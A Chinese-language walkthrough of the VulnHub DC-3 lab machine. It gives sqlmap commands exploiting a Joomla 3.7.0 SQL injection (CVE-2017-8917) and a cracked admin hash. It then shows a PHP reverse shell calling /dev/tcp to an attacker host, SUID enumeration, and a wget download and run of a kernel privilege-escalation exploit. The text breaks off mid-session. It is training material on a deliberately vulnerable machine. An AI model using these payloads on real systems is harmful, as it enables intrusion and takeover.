下载地址:https://www.vulnhub.com/entry/dc-3,312/
主机发现
扫描端口,发现只开启了80端口,通过-A参数,还可以看到该网站的CMS为Joomla
访问80端口
目录扫描,发现网站后台
使用nikto工具:nikto -host 192.168.44.144
使用dirsearch工具
python3 dirsearch.py -u http://192.168.44.144 -e php
使用joom专用漏洞扫描器joomscan,发现joomla的具体版本号
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl 192.168.44.144
使用searchsploit搜索joomla 3.7.0存在的漏洞
searchsploit joomla 3.7.0
根据给出的路径,读取该文件,发现该版本cms内存在sql注入漏洞CVE-2017-8917
打开sqlmap开始注入
暴库
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"
暴表
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables
暴字段
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users --columns
暴内容
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users -C "name,password" --dump
用户名:admin
密码:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
使用kali的John进行密码破解,得到后台登录密码snoopy
进入之前找到的网站后台进行登陆http://192.168.44.144/administrator/
在后台翻啊翻,发现了某处可以修改网站模版的地方,可以直接新建一个PHP文件,直接反弹shell。
& /dev/tcp/192.168.44.142/8080 0>&1'");?>
在kali上进行监听,nc -lvvp 8080端口
在浏览器上访问该反弹马,这一块路径卡了一会儿,
结合之前目录扫描出来的templates目录,和模板的名称bees3,再加上linux系统是大小敏感的,
因此花费了一些时间,才找到正确的路径,进行访问
这是kali已经接收到了shell,
权限很低,首先尝试suid提权,以下命令可以发现系统上运行的suid可执行文件
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000-exec ls -ldb {}
已知的可用来提权的linux可行性的文件:nmap,vim,find,bash,more,less,nano,cp
没有发现可以利用的文件
尝试内核提权
查看linux版本
利用searchsploit搜索可以利用的漏洞
根据路径,访问exp详细内容:cat /usr/share/exploitdb/exploits/linux/local/39772.txt
发现exp下载地址:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
查找具有执行权限的目录
切换到tmp文件夹下,并且下载searchsploit中的exp
切换:cd tmp
下载:wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
解压:unzip 39773.zip
再解压:tar -xvf exploit.tar
切换:cd ebpf_mapfd_doubleput_exploit/
执行: ./compile.sh
./doubleput
然后得到了root权限
www-data@DC3VM:/var/www/html$ cd tmp
cd tmp
www-data@DC3VM:/var/www/html/tmp$ ls
ls
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip